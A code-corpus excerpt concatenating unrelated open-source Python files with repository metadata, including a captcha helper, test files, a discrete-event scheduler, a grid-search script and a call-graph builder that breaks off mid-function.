# sensitive info
|
DigitalCampus/django-oppia
|
tests/oppia/test_context_processors.py
|
Python
|
gpl-3.0
| 2,547
| 0
|
import os, requests, tempfile, time, webbrowser
import lacuna.bc
import lacuna.exceptions as err
### Dev notes:
### The tempfile containing the captcha image is not deleted until solveit()
### has been called.
###
### Allowing the tempfile to delete itself (delete=True during tempfile
### creation), or using the tempfile in conjunction with a 'with:' expression,
### have both been attempted.
###
### The problem is that, when using those auto-deletion methods, the tempfile
### is occasionally being removed from the system before the image viewer
### we're firing off actually gets a chance to read it. Everything is
### happening in the right order, it's just that the image viewer startup is
### too slow.
###
### Deleting the tempfile manually in solveit() works - don't decide to get
### clever and replace the unlink() in solveit() with some form of tempfile
### autodeletion without a lot of testing.
class Captcha(lacuna.bc.LacunaObject):
""" Fetches, displays, and solves graphical captchas.
General usage will be::
cap = my_client.get_captcha()
cap.showit() # display the captcha image
cap.prompt_user() # ask the user for a solution
cap.solveit() # check the user's solution
"""
path = 'captcha'
@lacuna.bc.LacunaObject.call_returning_meth
def fetch( self, **kwargs ):
""" Fetches a captcha for the user to solve from the server.
This mirrors the TLE API, but you generally don't need to call this.
Returns a :class:`lacuna.captcha.Puzzle` object.
"""
return Puzzle( self.client, kwargs['rslt'] )
def showit( self ):
""" Actually downloads the captcha image, and attempts to display it
to the user in one of several browsers.
If :meth:`fetch` is called first, :meth:`showit` uses that fetched data, but
this is not necessary. :meth:`showit` will call fetch for you.
Raises :class:`lacuna.exceptions.RequestError` if the image is not
fetchable (network error or the TLE servers have gone down).
Raises EnvironmentError if it cannot find an image viewer to use to
display the captcha image.
"""
if not hasattr(self,'url') or not hasattr(self,'guid'):
puzzle = self.fetch()
self.url = puzzle.url
self.guid = puzzle.guid
img_resp = requests.get( self.url )
if img_resp.status_code != 200:
raise err.RequestError("The captcha image URL is not responding.")
f = tempfile.NamedTemporaryFile( suffix='.png', prefix='tle_capcha_', delete=False );
self.tempfile = f.name
f.write( img_resp.content )
if hasattr(img_resp, 'connection'):
img_resp.connection.close()
local_url = 'file://' + f.name
found_browser = False
for b in [ None, 'windows-default', 'macosx', 'safari', 'firefox',
'google-chrome', 'chrome', 'chromium-browser', 'chromium' ]:
try:
browser = webbrowser.get( b )
browser.open( local_url, 0, True )
found_browser = True
break
except webbrowser.Error as e:
pass
if not found_browser:
raise EnvironmentError("Unable to find a browser to show the captcha image. Captcha solution is required.")
def prompt_user(self):
""" Prompts the user to solve the displayed captcha.
It's not illegal to call this without first calling :meth:`solveit`,
but doing so makes no sense.
"""
self.resp = input("Enter the solution to the captcha here: ")
return self.resp
def solveit(self):
""" Sends the user's response to the server to check for accuracy.
Returns True if the user's response was correct. Raises
:class:`lacuna.exceptions.CaptchaResponseError` otherwise.
"""
if not hasattr(self,'resp'):
raise AttributeError("You must prompt the user for a response before calling solveit().")
try:
self.solve( self.guid, self.resp )
except err.ServerError as e:
raise err.CaptchaResponseError("Incorrect captcha response")
finally:
delattr( self, 'url' )
delattr( self, 'guid' )
delattr( self, 'resp' )
if os.path.isfile(self.tempfile):
os.unlink( self.tempfile )
return True
@lacuna.bc.LacunaObject.call_member_meth
def solve( self, guid:str, solution:str, **kwargs ):
""" Mirrors the TLE Captcha module's :meth:`solve` method, but unless you
really need this and you really know why, use :meth:`solveit` instead.
"""
pass
class Puzzle(lacuna.bc.SubClass):
"""
Object Attributes::
url FQ URL to the puzzle image
guid uuid attached to the puzzle; must be passed back along with
the solution.
"""
|
tmtowtdi/MontyLacuna
|
lib/lacuna/captcha.py
|
Python
|
mit
| 5,055
| 0.017013
|
from __future__ import unicode_literals
import os.path
from pre_commit.commands.clean import clean
from pre_commit.util import rmtree
def test_clean(runner_with_mocked_store):
assert os.path.exists(runner_with_mocked_store.store.directory)
clean(runner_with_mocked_store)
assert not os.path.exists(runner_with_mocked_store.store.directory)
def test_clean_empty(runner_with_mocked_store):
"""Make sure clean succeeds when we the directory doesn't exist."""
rmtree(runner_with_mocked_store.store.directory)
assert not os.path.exists(runner_with_mocked_store.store.directory)
clean(runner_with_mocked_store)
assert not os.path.exists(runner_with_mocked_store.store.directory)
|
Teino1978-Corp/pre-commit
|
tests/commands/clean_test.py
|
Python
|
mit
| 711
| 0
|
class Controller(object):
def __init__(self, model):
self._model = model
self._view = None
def register_view(self, view):
self._view = view
def on_quit(self, *args):
raise NotImplementedError
def on_keybinding_activated(self, core, time):
raise NotImplementedError
def on_show_about(self, sender):
raise NotImplementedError
def on_toggle_history(self, sender):
raise NotImplementedError
def on_show_preferences(self, sender):
raise NotImplementedError
def on_query_entry_changed(self, entry):
raise NotImplementedError
def on_query_entry_key_press_event(self, entry, event):
raise NotImplementedError
def on_query_entry_activate(self, entry):
raise NotImplementedError
def on_treeview_cursor_changed(self, treeview):
raise NotImplementedError
def on_match_selected(self, treeview, text, match_obj, event):
raise NotImplementedError
def on_do_default_action(self, treeview, text, match_obj, event):
raise NotImplementedError
def on_action_selected(self, treeview, text, action, event):
raise NotImplementedError
def on_clear_history(self, sender):
raise NotImplementedError
def on_history_match_selected(self, history, text, match):
raise NotImplementedError
|
benpicco/mate-deskbar-applet
|
deskbar/interfaces/Controller.py
|
Python
|
gpl-2.0
| 1,455
| 0.010309
|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
from ggrc.converters import errors
from integration.ggrc import converters
class TestBasicCsvImport(converters.TestCase):
def setUp(self):
converters.TestCase.setUp(self)
self.client.get("/login")
def test_policy_basic_import(self):
filename = "ca_setup_for_deletion.csv"
self.import_file(filename)
filename = "ca_deletion.csv"
response_data_dry = self.import_file(filename, dry_run=True)
response_data = self.import_file(filename)
self.assertEqual(response_data_dry, response_data)
self.assertEqual(response_data[0]["deleted"], 2)
self.assertEqual(response_data[0]["ignored"], 0)
|
NejcZupec/ggrc-core
|
test/integration/ggrc/converters/test_import_delete.py
|
Python
|
apache-2.0
| 744
| 0.002688
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
with open('requirements.txt') as f:
requirements = f.read().splitlines()
with open('cli-requirements.txt') as f:
cli_requirements = f.read().splitlines()
setuptools.setup(
name="uwg",
use_scm_version=True,
setup_requires=['setuptools_scm'],
author="Ladybug Tools",
author_email="info@ladybug.tools",
description="Python application for modeling the urban heat island effect.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ladybug-tools/uwg",
packages=setuptools.find_packages(exclude=["tests*", "resources*"]),
include_package_data=True,
install_requires=requirements,
extras_require={
'cli': cli_requirements
},
entry_points={
"console_scripts": ["uwg = uwg.cli:main"]
},
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: Implementation :: CPython",
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
"Operating System :: OS Independent"
],
)
|
chriswmackey/UWG_Python
|
setup.py
|
Python
|
gpl-3.0
| 1,278
| 0.000782
|
from collections import UserList
from gear import ffxiv, xivdb
from gear import power as p
"""Class representing a simple gear element.
"""
class Gear(object):
"""Gear(slot, item_id, **attributes)
slot : in which slot of the gearset is this precise gear, as defined
in ffxiv.slots.
item_id : identifier from xivdb.com. Will load the gear
from there if provided
attributes : the attributes of the gear as defined in ffxiv.attributes.
"""
def __init__(self, slot, item_id = None, **attributes):
if item_id is not None :
attributes = xivdb.getId(item_id)
assert(slot in ffxiv.slots)
self.slot = slot
# We filter out what is not a legitimate FFXIV attribute
self.attributes = dict(filter(
lambda a:a[0] in ffxiv.attributes,
attributes.items()))
# We put the rest in self.misc
self.misc = dict(filter(
lambda a:a[0] not in ffxiv.attributes,
attributes.items()))
"""Class representing a complete gear set.
Can be called by specifying the Lodestone ID for
the character or by specifying the gear
for each gear slot, as defined in ffxiv.slots.
"""
class GearSet(Gear):
"""GearSet(character_id, **gears)
character_id : provide to load gearset from Lodestone.
gears : pairs slot=Gear
"""
def __init__(self,
character_id=None,
**gears
):
self.gears = {}
# If we do not fetch the gearset from Lodestone
if character_id is None:
for s in ffxiv.slots:
g = gears.get(s)
assert(g is None or g.slot == s)
self.gear[s] = g
else:
pass #TODO add fetching gearset from Lodestone
# A GearSet is treated as a Gear, so we update the attributes
attributes = { k : sum(
[g.attributes.get(k,0)
for g in self.gears.values() if g is not None
], start=0)
for k in ffxiv.attributes}
super().__init__(None,*attributes)
"""List of GearSets to compare.
"""
class GearSetList(UserList):
"""GearSetList(data)
data : an iterable of gearsets
"""
def __init__(self, data=[]):
super().__init__(data)
"""maxPower(job,consraintList)
Returns the best gearset for job given a list of constraints.
"""
def maxPower(self,job, constraintList=None):
pass
"""Function to calculate the power of a gear for job.
"""
def power(gear, job):
return sum([int(gear.attributes.get(k,0))*v
for k,v in ffxiv.weights[job].items()])
|
Rosslaew/OptiGear
|
gear/gear.py
|
Python
|
mit
| 2,681
| 0.012309
|
import sys
sys.path.insert(1, "../../../")
import h2o
def binop_plus(ip,port):
# Connect to h2o
h2o.init(ip,port)
iris = h2o.import_frame(path=h2o.locate("smalldata/iris/iris_wheader_65_rows.csv"))
rows, cols = iris.dim()
iris.show()
###################################################################
# LHS: scaler, RHS: H2OFrame
res = 2 + iris
res_rows, res_cols = res.dim()
assert res_rows == rows and res_cols == cols, "dimension mismatch"
for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]):
assert abs(x - y) < 1e-1, "expected same values"
# LHS: scaler, RHS: scaler
res = 2 + iris[0]
res2 = 1.1 + res[21,:]
assert abs(res2 - 8.2) < 1e-1, "expected same values"
###################################################################
# LHS: scaler, RHS: H2OFrame
res = 1.2 + iris[2]
res2 = res[21,:] + iris
res2.show()
# LHS: scaler, RHS: H2OVec
res = 1.2 + iris[2]
res2 = res[21,:] + iris[1]
res2.show()
# LHS: scaler, RHS: scaler
res = 1.1 + iris[2]
res2 = res[21,:] + res[10,:]
assert abs(res2 - 5.2) < 1e-1, "expected same values"
# LHS: scaler, RHS: scaler
res = 2 + iris[0]
res2 = res[21,:] + 3
assert abs(res2 - 10.1) < 1e-1, "expected same values"
###################################################################
# LHS: H2OVec, RHS: H2OFrame
#try:
# res = iris[2] + iris
# res.show()
# assert False, "expected error. objects with different dimensions not supported."
#except EnvironmentError:
# pass
# LHS: H2OVec, RHS: scaler
res = 1.2 + iris[2]
res2 = iris[1] + res[21,:]
res2.show()
###################################################################
# LHS: H2OFrame, RHS: H2OFrame
res = iris + iris
res_rows, res_cols = res.dim()
assert res_rows == rows and res_cols == cols, "dimension mismatch"
res = iris[0:2] + iris[1:3]
res_rows, res_cols = res.dim()
assert res_rows == rows and res_cols == 2, "dimension mismatch"
#try:
# res = iris + iris[0:3]
# res.show()
# assert False, "expected error. frames are different dimensions."
#except EnvironmentError:
# pass
# LHS: H2OFrame, RHS: H2OVec
#try:
# res = iris + iris[0]
# res.show()
# assert False, "expected error. objects of different dimensions not supported."
#except EnvironmentError:
# pass
# LHS: H2OFrame, RHS: scaler
res = 1.2 + iris[2]
res2 = iris + res[21,:]
res2.show()
# LHS: H2OFrame, RHS: scaler
res = iris + 2
res_rows, res_cols = res.dim()
assert res_rows == rows and res_cols == cols, "dimension mismatch"
for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]):
assert abs(x - y) < 1e-1, "expected same values"
###################################################################
if __name__ == "__main__":
h2o.run_test(sys.argv, binop_plus)
|
ChristosChristofidis/h2o-3
|
h2o-py/tests/testdir_munging/binop/pyunit_binop2_plus.py
|
Python
|
apache-2.0
| 3,072
| 0.008138
|
"""
https://codility.com/programmers/task/equi_leader/
"""
from collections import Counter, defaultdict
def solution(A):
def _is_equi_leader(i):
prefix_count_top = running_counts[top]
suffix_count_top = total_counts[top] - prefix_count_top
return (prefix_count_top * 2 > i + 1) and (suffix_count_top * 2 > len(A) - i - 1)
total_counts = Counter(A)
running_counts = defaultdict(int)
top = A[0]
result = 0
for i in xrange(len(A) - 1):
n = A[i]
running_counts[n] += 1
top = top if running_counts[top] >= running_counts[n] else n
if _is_equi_leader(i):
result += 1
return result
|
py-in-the-sky/challenges
|
codility/equi_leader.py
|
Python
|
mit
| 707
| 0.007072
|
# Copyright 2014 Modelling, Simulation and Design Lab (MSDL) at
# McGill University and the University of Antwerp (http://msdl.cs.mcgill.ca/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The No Age scheduler is based on the Heapset scheduler, though it does not take age into account.
.. warning:: This scheduler does not take the age into account, making it **unusable** in simulations where the *timeAdvance* function can return (exactly) 0. If unsure, do **not** use this scheduler, but the more general Heapset scheduler.
The heap will contain only the timestamps of events that should happen. One of the dictionaries will contain the actual models that transition at the specified time. The second dictionary than contains a reverse relation: it maps the models to their time_next. This reverse relation is necessary to know the *old* time_next value of the model. Because as soon as the model has its time_next changed, its previously scheduled time will be unknown. This 'previous time' is **not** equal to the *timeLast*, as it might be possible that the models wait time was interrupted.
For a schedule, the model is added to the dictionary at the specified time_next. In case it is the first element at this location in the dictionary, we also add the timestamp to the heap. This way, the heap only contains *unique* timestamps and thus the actual complexity is reduced to the number of *different* timestamps. Furthermore, the reverse relation is also updated.
Unscheduling is done similarly by simply removing the element from the dictionary.
Rescheduling is a slight optimisation of unscheduling, followed by scheduling.
This scheduler does still schedule models that are inactive (their time_next is infinity), though this does not influence the complexity. The complexity is not affected due to infinity being a single element in the heap that is always present. Since a heap has O(log(n)) complexity, this one additional element does not have a serious impact.
The main advantage over the Activity Heap is that it never gets dirty and thus doesn't require periodical cleanup. The only part that gets dirty is the actual heap, which only contains small tuples. Duplicates of these will also be reduced to a single element, thus memory consumption should not be a problem in most cases.
This scheduler is ideal in situations where most transitions happen at exactly the same time, as we can then profit from the internal structure and simply return the mapped elements. It results in sufficient efficiency in most other cases, mainly due to the code base being a lot smaller then the Activity Heap.
"""
from heapq import heappush, heappop
from pypdevs.logger import *
class SchedulerNA(object):
"""
Scheduler class itself
"""
def __init__(self, models, epsilon, total_models):
"""
Constructor
:param models: all models in the simulation
"""
self.heap = []
self.reverse = [None] * total_models
self.mapped = {}
self.infinite = float('inf')
# Init the basic 'inactive' entry here, to prevent scheduling in the heap itself
self.mapped[self.infinite] = set()
self.epsilon = epsilon
for m in models:
self.schedule(m)
def schedule(self, model):
"""
Schedule a model
:param model: the model to schedule
"""
try:
self.mapped[model.time_next[0]].add(model)
except KeyError:
self.mapped[model.time_next[0]] = set([model])
heappush(self.heap, model.time_next[0])
try:
self.reverse[model.model_id] = model.time_next[0]
except IndexError:
self.reverse.append(model.time_next[0])
def unschedule(self, model):
"""
Unschedule a model
:param model: model to unschedule
"""
try:
self.mapped[self.reverse[model.model_id]].remove(model)
except KeyError:
pass
self.reverse[model.model_id] = None
def massReschedule(self, reschedule_set):
"""
Reschedule all models provided.
Equivalent to calling unschedule(model); schedule(model) on every element in the iterable.
:param reschedule_set: iterable containing all models to reschedule
"""
#NOTE the usage of exceptions is a lot better for the PyPy JIT and nets a noticable speedup
# as the JIT generates guard statements for an 'if'
for model in reschedule_set:
model_id = model.model_id
try:
self.mapped[self.reverse[model_id]].remove(model)
except KeyError:
# Element simply not present, so don't need to unschedule it
pass
self.reverse[model_id] = tn = model.time_next[0]
try:
self.mapped[tn].add(model)
except KeyError:
# Create a tuple with a single entry and use it to initialize the mapped entry
self.mapped[tn] = set((model, ))
heappush(self.heap, tn)
def readFirst(self):
"""
Returns the time of the first model that has to transition
:returns: timestamp of the first model
"""
first = self.heap[0]
while len(self.mapped[first]) == 0:
del self.mapped[first]
heappop(self.heap)
first = self.heap[0]
# The age was stripped of
return (first, 1)
def getImminent(self, time):
"""
Returns a list of all models that transition at the provided time, with the specified epsilon deviation allowed.
:param time: timestamp to check for models
.. warning:: For efficiency, this method only checks the **first** elements, so trying to invoke this function with a timestamp higher than the value provided with the *readFirst* method, will **always** return an empty set.
"""
t, age = time
imm_children = set()
try:
first = self.heap[0]
if (abs(first - t) < self.epsilon):
#NOTE this would change the original set, though this doesn't matter as it is no longer used
imm_children = self.mapped.pop(first)
heappop(self.heap)
first = self.heap[0]
while (abs(first - t) < self.epsilon):
imm_children |= self.mapped.pop(first)
heappop(self.heap)
first = self.heap[0]
except IndexError:
pass
return imm_children
|
kdheepak89/pypdevs
|
pypdevs/schedulers/schedulerNA.py
|
Python
|
apache-2.0
| 7,125
| 0.002947
|
# Grid Search for Algorithm Tuning
import numpy as np
import pandas as pd
from sklearn import datasets
from sklearn.linear_model import Ridge
from sklearn.grid_search import GridSearchCV
### Plotting function ###
from matplotlib import pyplot as plt
from sklearn.metrics import r2_score
def plot_r2(y, y_pred, title):
plt.figure(figsize=(10, 6))
plt.grid()
plt.scatter(y, y_pred, marker='.')
plt.xlabel("Actual Target"); plt.ylabel("Predicted Target")
plt.title(title)
xmn, xmx = plt.xlim()
ymn, ymx = plt.ylim()
mx = max(xmx, ymx)
buff = mx * .1
plt.text(xmn + buff, mx - buff, "R2 Score: %f" % (r2_score(y, y_pred), ), size=15)
plt.plot([0., mx], [0., mx])
plt.xlim(xmn, mx)
plt.ylim(ymn, mx)
### Preprocessing ###
dataset = pd.read_csv("train.csv")
dataset.head()
feats = dataset.drop("revenue", axis=1)
X = feats.values #features
y = dataset["revenue"].values #target
# prepare a range of alpha values to test
alphas = np.array([1,0.1,0.01,0.001,0.0001,0])
# 100000 works best.
# create and fit a ridge regression model, testing each alpha
model = Ridge()
grid = GridSearchCV(estimator=model, param_grid=dict(alpha=alphas))
y_pred = grid.fit(X, y)
r2_score(y, y_pred)
rmse = sqrt(mean_squared_error(y, y_pred))
print rmse
|
WesleyyC/Restaurant-Revenue-Prediction
|
Ari/needs_work/GridSearch.py
|
Python
|
mit
| 1,295
| 0.018533
|
from .site import Site
|
msosvi/flask-pyco
|
flask_pyco/__init__.py
|
Python
|
bsd-3-clause
| 23
| 0
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Alexander Shorin
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
import logging
import socket
from .asynclib import loop
from .codec import encode
from .constants import ENQ, EOT
from .exceptions import NotAccepted
from .mapping import Record
from .protocol import ASTMProtocol
log = logging.getLogger(__name__)
__all__ = ['Client', 'Emitter']
class RecordsStateMachine(object):
"""Simple state machine to track emitting ASTM records in right order.
:param mapping: Mapping of the ASTM records flow order.
Keys should be string and defines record type, while values
expected as sequence of other record types that may be used
after current one.
For example: ``{"H": ["P", "C", "L"]}`` mapping defines that
if previous record had ``"H"`` type, then the next one
should have ``"P"``, ``"C"`` or ``"L"`` type or
:exc:`AssertionError` will be raised. The default mapping
reflects common ASTM records flow rules. If this argument
specified as :const:`None` no rules will be applied.
:type: dict
"""
def __init__(self, mapping):
self.mapping = mapping
self.state = None
def __call__(self, state):
if state is not None:
assert self.is_acceptable(state),\
'invalid state %r, expected one of: %r' \
% (state, self.mapping[self.state])
self.state = state
def is_acceptable(self, state):
if self.mapping is None:
return True
if state not in self.mapping:
return False
next_types = self.mapping[self.state]
return '*' in next_types or state in next_types
DEFAULT_RECORDS_FLOW_MAP = {
None: ['H'],
'H': ['C', 'M', 'P', 'Q', 'L'],
'P': ['C', 'M', 'O', 'L'],
'Q': ['C', 'M', 'O', 'L'],
'O': ['C', 'M', 'P', 'O', 'R', 'L'],
'R': ['C', 'M', 'P', 'O', 'R', 'S', 'L'],
'S': ['C', 'M', 'P', 'O', 'R', 'S', 'L'],
'C': ['*'],
'M': ['*'],
'L': ['H']
}
class Emitter(object):
"""ASTM records emitter for :class:`Client`.
Used as wrapper for user provided one to provide proper routines around for
sending Header and Terminator records.
:param emitter: Generator/coroutine.
:param encoding: Data encoding.
:type encoding: str
:param flow_map: Records flow map. Used by :class:`RecordsStateMachine`.
:type: dict
:param chunk_size: Chunk size in bytes. If :const:`None`, emitter record
wouldn't be split into chunks.
:type chunk_size: int
:param bulk_mode: Sends all records for single session (starts from Header
and ends with Terminator records) via single message
instead of sending each record separately. If result
message is too long, it may be split by chunks if
`chunk_size` is not :const:`None`. Keep in mind, that
collecting all records for single session may take some
time and server may reject data by timeout reason.
:type bulk_mode: bool
"""
#: Records state machine controls emitting records in right order. It
#: receives `records_flow_map` as only argument on Emitter initialization.
state_machine = RecordsStateMachine
def __init__(self, emitter, flow_map, encoding,
chunk_size=None, bulk_mode=False):
self._emitter = emitter()
self._is_active = False
self.encoding = encoding
self.records_sm = self.state_machine(flow_map)
# flag to signal that user's emitter produces no records
self.empty = False
# last sent sequence number
self.last_seq = 0
self.buffer = []
self.chunk_size = chunk_size
self.bulk_mode = bulk_mode
def _get_record(self, value=None):
record = self._emitter.send(value if self._is_active else None)
if not self._is_active:
self._is_active = True
if isinstance(record, Record):
record = record.to_astm()
try:
self.records_sm(record[0])
except Exception as err:
self.throw(type(err), err.args)
return record
def _send_record(self, record):
if self.bulk_mode:
records = [record]
while True:
record = self._get_record(True)
records.append(record)
if record[0] == 'L':
break
chunks = encode(records, self.encoding, self.chunk_size)
else:
self.last_seq += 1
chunks = encode([record], self.encoding,
self.chunk_size, self.last_seq)
self.buffer.extend(chunks)
data = self.buffer.pop(0)
self.last_seq += len(self.buffer)
if record[0] == 'L':
self.last_seq = 0
self.buffer.append(EOT)
return data
def send(self, value=None):
"""Passes `value` to the emitter. Semantically acts in same way as
:meth:`send` for generators.
If the emitter has any value within local `buffer` the returned value
will be extracted from it unless `value` is :const:`False`.
:param value: Callback value. :const:`True` indicates that previous
record was successfully received and accepted by server,
:const:`False` signs about his rejection.
:type value: bool
:return: Next record data to send to server.
:rtype: bytes
"""
if self.buffer and value:
return self.buffer.pop(0)
record = self._get_record(value)
return self._send_record(record)
def throw(self, exc_type, exc_val=None, exc_tb=None):
"""Raises exception inside the emitter. Acts in same way as
:meth:`throw` for generators.
If the emitter had catch an exception and return any record value, it
will be proceeded in common way.
"""
record = self._emitter.throw(exc_type, exc_val, exc_tb)
if record is not None:
return self._send_record(record)
def close(self):
"""Closes the emitter. Acts in same way as :meth:`close` for generators.
"""
self._emitter.close()
class Client(ASTMProtocol):
"""Common ASTM client implementation.
:param emitter: Generator function that will produce ASTM records.
:type emitter: function
:param host: Server IP address or hostname.
:type host: str
:param port: Server port number.
:type port: int
:param timeout: Time to wait for response from server. If response wasn't
received, the :meth:`on_timeout` will be called.
If :const:`None` this timer will be disabled.
:type timeout: int
:param flow_map: Records flow map. Used by :class:`RecordsStateMachine`.
:type: dict
:param chunk_size: Chunk size in bytes. :const:`None` value prevents
records chunking.
:type chunk_size: int
:param bulk_mode: Sends all records for single session (starts from Header
and ends with Terminator records) via single message
instead of sending each record separately. If result
message is too long, it may be split by chunks if
`chunk_size` is not :const:`None`. Keep in mind, that
collecting all records for single session may take some
time and server may reject data by timeout reason.
:type bulk_mode: bool
Base `emitter` is a generator that yield ASTM records one by one preserving
their order::
from astm.records import (
HeaderRecord, PatientRecord, OrderRecord, TerminatorRecord
)
def emitter():
assert (yield HeaderRecord()), 'header was rejected'
ok = yield PatientRecord(name={'last': 'foo', 'first': 'bar'})
if ok: # you also can decide what to do in case of record rejection
assert (yield OrderRecord())
yield TerminatorRecord() # we may do not care about rejection
:class:`Client` thought :class:`RecordsStateMachine` keep track
on this order, raising :exc:`AssertionError` if it is broken.
When `emitter` terminates with :exc:`StopIteration` or :exc:`GeneratorExit`
exception client connection to server closing too. You may provide endless
`emitter` by wrapping function body with ``while True: ...`` loop polling
data from source from time to time. Note, that server may have communication
timeouts control and may close session after some time of inactivity, so
be sure that you're able to send whole session (started by Header record and
ended by Terminator one) within limited time frame (commonly 10-15 sec.).
"""
#: Wrapper of emitter to provide session context and system logic about
#: sending head and tail data.
emitter_wrapper = Emitter
def __init__(self, emitter, host='localhost', port=15200,
encoding=None, timeout=20, flow_map=DEFAULT_RECORDS_FLOW_MAP,
chunk_size=None, bulk_mode=False):
super(Client, self).__init__(timeout=timeout)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connect((host, port))
self.emitter = self.emitter_wrapper(
emitter,
encoding=encoding or self.encoding,
flow_map=flow_map,
chunk_size=chunk_size,
bulk_mode=bulk_mode
)
self.terminator = 1
def handle_connect(self):
"""Initiates ASTM communication session."""
super(Client, self).handle_connect()
self._open_session()
def handle_close(self):
self.emitter.close()
super(Client, self).handle_close()
def _open_session(self):
self.push(ENQ)
def _close_session(self, close_connection=False):
self.push(EOT)
if close_connection:
self.close_when_done()
def run(self, timeout=1.0, *args, **kwargs):
"""Enters into the :func:`polling loop <astm.asynclib.loop>` to let
client send outgoing requests."""
loop(timeout, *args, **kwargs)
def on_enq(self):
"""Raises :class:`NotAccepted` exception."""
raise NotAccepted('Client should not receive ENQ.')
def on_ack(self):
"""Handles ACK response from server.
Provides callback value :const:`True` to the emitter and sends next
message to server.
"""
try:
message = self.emitter.send(True)
except StopIteration:
self._close_session(True)
else:
self.push(message)
if message == EOT:
self._open_session()
def on_nak(self):
"""Handles NAK response from server.
If it was received on ENQ request, the client tries to repeat last
request for allowed amount of attempts. For others it send callback
value :const:`False` to the emitter."""
if self._last_sent_data == ENQ:
return self.push(ENQ)
try:
message = self.emitter.send(False)
except StopIteration:
self._close_session(True)
except Exception:
self._close_session(True)
raise
else:
self.push(message)
if message == EOT:
self._open_session()
def on_eot(self):
"""Raises :class:`NotAccepted` exception."""
raise NotAccepted('Client should not receive EOT.')
def on_message(self):
"""Raises :class:`NotAccepted` exception."""
raise NotAccepted('Client should not receive ASTM message.')
def on_timeout(self):
"""Sends final EOT message and closes connection after his receiving."""
super(Client, self).on_timeout()
self._close_session(True)
|
eddiep1101/python-astm
|
build/lib/astm/client.py
|
Python
|
bsd-3-clause
| 12,288
| 0.000488
|
# -*- coding: utf-8 -*-
#
# LICENCE MIT
#
# DESCRIPTION Callgraph builder.
#
# AUTHOR Michal Bukovsky <michal.bukovsky@trilogic.cz>
#
from operator import attrgetter
from inspect import signature
from callgraph.hooks import Hooks
from callgraph.utils import AuPair
from callgraph.symbols import Symbol, UnarySymbol
from callgraph.symbols import IterableConstantSymbol, MappingConstantSymbol
from callgraph.nodes import make_node
from callgraph.indent_printer import IndentPrinter, NonePrinter, dump_tree
# TODO(burlog): hooks as callbacks
# TODO(burlog): properties tests
# TODO(burlog): process signature? are defs invoked during import?
# TODO(burlog): tests for global variables
# TODO(burlog): __getattr__, __getattribute__ overrides will be problem
# TODO(burlog): make result of list(), tuple(), dict(), ... iterable
class CallGraphBuilder(object):
def __init__(self, global_variables={}, silent=False):
self.printer = NonePrinter() if silent else IndentPrinter()
self.global_symbols = self.make_kwargs_symbols(global_variables)
self.hooks = Hooks(self)
self.current_lineno = 0
self.tot = None
def print_banner(self, printer, node):
extra = "<" + node.qualname + "> " if node.qualname != node.name else ""
printer("@ Analyzing: {0} {1}at {2}:{3}"\
.format(node.ast.name, extra, node.filename, node.lineno))
def set_current_lineno(self, printer, expr_lineno):
lineno = self.tot.lineno + expr_lineno
if lineno == self.current_lineno: return
self.current_lineno = lineno
printer("+ line at {0}:{1}".format(self.tot.filename, lineno))
printer("+", self.tot.source_line(expr_lineno).strip())
def make_kwargs_symbols(self, kwargs):
return dict((k, UnarySymbol(self, k, v)) for k, v in kwargs.items())
def build(self, function, kwargs={}):
self.root = None
self.hooks.clear()
symbol = UnarySymbol(self, function.__name__, function)
return self.process(symbol, kwargs=self.make_kwargs_symbols(kwargs))
def process(self, symbol, parent=None, args=[], kwargs={}):
# attach new node to parent list
node = make_node(symbol)
with AuPair(self, node):
if parent:
where = parent.filename, self.current_lineno
if not parent.attach(node, where): return node
# builtins or c/c++ objects have no code
if node.is_opaque: return node
if not symbol.iscallable(): return node
# print nice banner
self.print_banner(self.printer, node)
# magic follows
with self.printer as printer:
self.inject_arguments(printer, node, args, kwargs)
self.process_function(printer, node, args, kwargs)
return node
def process_function(self, printer, node, args, kwargs):
for expr in node.ast.body:
for callee, args, kwargs in expr.evaluate(printer, node.symbol):
self.process(callee, node, args.copy(), kwargs.copy())
def inject_arguments(self, printer, node, args, kwargs):
sig = signature(node.symbol.value)
self.inject_self(printer, node, sig, args, kwargs)
bound = sig.bind_partial(*args, **self.polish_kwargs(sig, kwargs))
self.inject_defaults(printer, node, sig, bound)
for name, value in bound.arguments.items():
value_symbol = self.as_symbol(value)
printer("% Binding argument:", name + "=" + str(value_symbol))
node.symbol.set(name, value_symbol)
def polish_kwargs(self, sig, kwargs):
for param in sig.parameters.values():
if param.kind == param.VAR_KEYWORD:
return kwargs
return dict(self.iter_kwargs(sig, kwargs))
def iter_kwargs(self, sig, kwargs):
for param in sig.parameters.values():
if param.kind == param.POSITIONAL_OR_KEYWORD:
if param.name in kwargs:
yield param.name, kwargs[param.name]
def inject_self(self, printer, node, sig, args, kwargs):
if node.symbol.myself and sig.parameters:
# TODO(burlog): better bound method detection
if next(iter(sig.parameters.keys())) == "self":
args.insert(0, node.symbol.myself)
else:
# TODO(burlog): improve detection logic
kwargs["self"] = node.symbol.myself
def inject_defaults(self, printer, node, sig, bound):
for param in sig.parameters.values():
if param.name not in bound.arguments:
if param.default is not param.empty:
symbol = UnarySymbol(self, param.name, param.default)
bound.arguments[param.name] = symbol
def as_symbol(self, value):
if isinstance(value, Symbol):
return value
elif isinstance(value, (tuple, list)):
return IterableConstantSymbol(self, tuple, value)
elif isinstance(value, dict):
values = list(value.values())
keys = list(UnarySymbol(self, "str", k) for k in value.keys())
